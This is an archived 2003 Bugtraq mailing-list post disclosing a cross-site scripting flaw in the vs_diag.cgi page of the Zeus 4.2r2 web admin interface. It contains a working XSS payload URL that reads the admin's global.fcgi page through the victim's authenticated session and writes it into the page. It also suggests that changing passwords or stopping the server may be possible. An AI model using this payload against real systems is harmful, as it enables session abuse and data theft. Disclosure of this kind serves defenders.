lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20030529174830.9975.qmail@www.securityfocus.com>
Date: 29 May 2003 17:48:30 -0000
From: Hugo "Vázquez" "Caramés" <overclocking_a_la_abuela@...mail.com>
To: bugtraq@...urityfocus.com
Subject: Another ZEUS  Server web admin XSS!




Hi,

another XSS, now on the ZEUS web admin interface.
The tested software is Zeus 4.2r2 (webadmin-4.2r2) on Linux x86

This is not the same issue as bid 6144 (index.fcgi),
now is on "vs_diag.cgi".

Exploit is simple:

http://<target>:9090/apps/web/vs_diag.cgi?server=<YOUR_CODE>

I have read this post: (http://www.securityfocus.com/archive/1/302961), 
regarding "index.fcgi" XSS.Mr, Colin Watson, claims that XSS bug on their 
software is not a big risk because: "The Zeus Administration Server uses 
cookies to record several items oftransient state: the state of the 
folding list of groups of virtualservers, and the list of currently 
monitored variables and machines ifreal-time monitoring is in place.  It 
does not use cookies to store any security-sensitive information (...)" 

Who needs cookies? :-) ZEUS uses "Basic Auth" (base 64 encoded) for the 
session tracking...but ZEUS does not allow http TRACE method, so we can 
not run a XST (Cross Site Tracing) against it :-(
I know litle about client side scripting, but probably there's some way to 
send POST requests and... change the admin password?, stop the web 
server?... I'm quite sure there's some way to do this.

With the script we show below an attacker can do an HTTP request to the 
web admin interface of the ZEUS and redirect the output...  
Of course you have to trick the admin...

http://<target>:9090/apps/web/vs_diag.cgi?server=&lt;script&gt;function%20pedo()
{var%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open
("GET","http://<target>:9090/apps/web/global.fcgi",false);xmlHttp.send
();xmlDoc=xmlHttp.responseText;document.write(xmlDoc);}pedo();alert("Have%
20you%20enabled%20the%20protection%20of%20your%20ZEUS...?%20We%20can%20rip%
20this%20info!%20Much%20more%20evil%20actions%20are%20possible...")
&lt;/script&gt;

This is for IE, for other browsers you may modify this code.
Imagination is the best friend of the attacker. Open your minds, XSS does 
not only means execution of commands on the client side... succefully 
exploited, in some scenarios (like web admin interfaces) those bugs can 
lead on execution of commands on the server side... 

See you,

Hugo Vázquez Caramés & Toni Cortés Martínez
INFOHACKING RESEARCH 2003
www.infohacking.com
Barcelona
Spain

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ